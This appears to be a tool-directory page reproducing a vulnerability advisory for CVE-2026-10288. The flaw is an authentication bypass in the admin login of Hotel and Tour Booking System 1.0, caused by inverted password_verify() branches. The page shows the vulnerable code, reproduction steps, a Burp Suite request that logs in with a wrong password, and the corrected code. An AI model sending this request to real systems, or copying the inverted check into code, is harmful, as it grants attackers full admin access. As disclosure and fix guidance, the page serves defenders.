Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-10288-AUTH-BYPASS | Kitploit
工具/GitHubGitHub/xmyronn/cve-2026-10288-auth-bypass
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试身份验证
GitHubxmyronn/cve-2026-10288-auth-bypass

CVE-2026-10288-AUTH-BYPASS

查看仓库
2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

酒店与旅游预订系统 - 身份验证绕过

漏洞详情

字段详情
标题酒店与旅游预订系统 - 身份验证绕过
供应商code-projects.org
产品酒店与旅游预订系统
版本1.0
漏洞类型不当身份验证
CWECWE-287
CVSS 分数9.0(严重)
CVSS 向量CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
受影响文件/admin/login.php
是否需要身份验证否
是否可远程利用是

描述

酒店与旅游预订系统 1.0 的管理员登录功能中存在一个严重的身份验证绕过漏洞。该漏洞是由对 password_verify() 返回值的条件判断颠倒所致,导致应用程序在提供错误密码时授予访问权限,而在提供正确密码时拒绝访问。未经身份验证的远程攻击者只需提供有效的电子邮件地址和任意错误的密码,即可获得完全的管理员访问权限。


根因

文件: admin/login.php — 第 39–46 行

root@kitploit:~
if(password_verify($password, $user['password'])){
    // BUG: password_verify() returns TRUE when password is CORRECT
    // but the error message is placed here instead of login logic
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
} else {
    // BUG: this block executes when password is WRONG
    // but login is granted here instead of showing an error
    $userID = $user['id'];
    login($userID);
}

password_verify() 在所提供的密码与哈希匹配时返回 true。开发人员将成功逻辑放在了 else 分支中(该分支在函数返回 false 时执行),这意味着任何错误密码都会被授予认证权限。


影响

远程未认证攻击者可以:

  • 获得应用程序的完全管理员访问权限
  • 查看、修改和删除所有房间及旅游预订
  • 添加、编辑或删除房间、旅游项目和活动
  • 访问所有已注册用户数据
  • 在不知道管理员密码的情况下执行所有管理操作

复现步骤

环境搭建: 在 XAMPP 上安装酒店与旅游预订系统 1.0。通过 http://localhost/ht/ 访问该应用。

第 1 步: 导航到管理员登录页面。

http:///ht/admin/login.php

第 2 步: 输入有效的管理员电子邮件和任意错误密码。

电子邮件: [email protected] 密码: wrongpassword

第 3 步: 点击登录。

结果: 应用程序绕过身份验证并重定向到管理员仪表板(index.php)——使用错误密码即可获得完全的管理员访问权限。


概念验证(Burp Suite)

请求:

root@kitploit:~
POST /ht/admin/login.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

email=admin%40admin.com&password=test1234&login=Login

响应:

root@kitploit:~
HTTP/1.1 302 Found
Location: index.php

返回 302 重定向到 index.php,确认使用错误密码成功通过身份验证。


截图

1. 登录页面 — 输入了错误密码

Screenshot 2026-05-11 232154

2. Burp Suite — 302 重定向确认绕过

Screenshot 2026-05-11 232205

3. 源代码 — 逻辑颠倒

Screenshot 2026-05-11 232228

修复建议

交换条件分支,使 password_verify() 返回 true 时授予登录权限:

root@kitploit:~
// FIXED
if(password_verify($password, $user['password'])){
    $userID = $user['id'];
    login($userID);
} else {
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
}

参考

  • CWE-287:不当身份验证
  • 酒店与旅游预订系统 — code-projects.org

发现者

Imad Alvi — 独立安全研究员

下载工具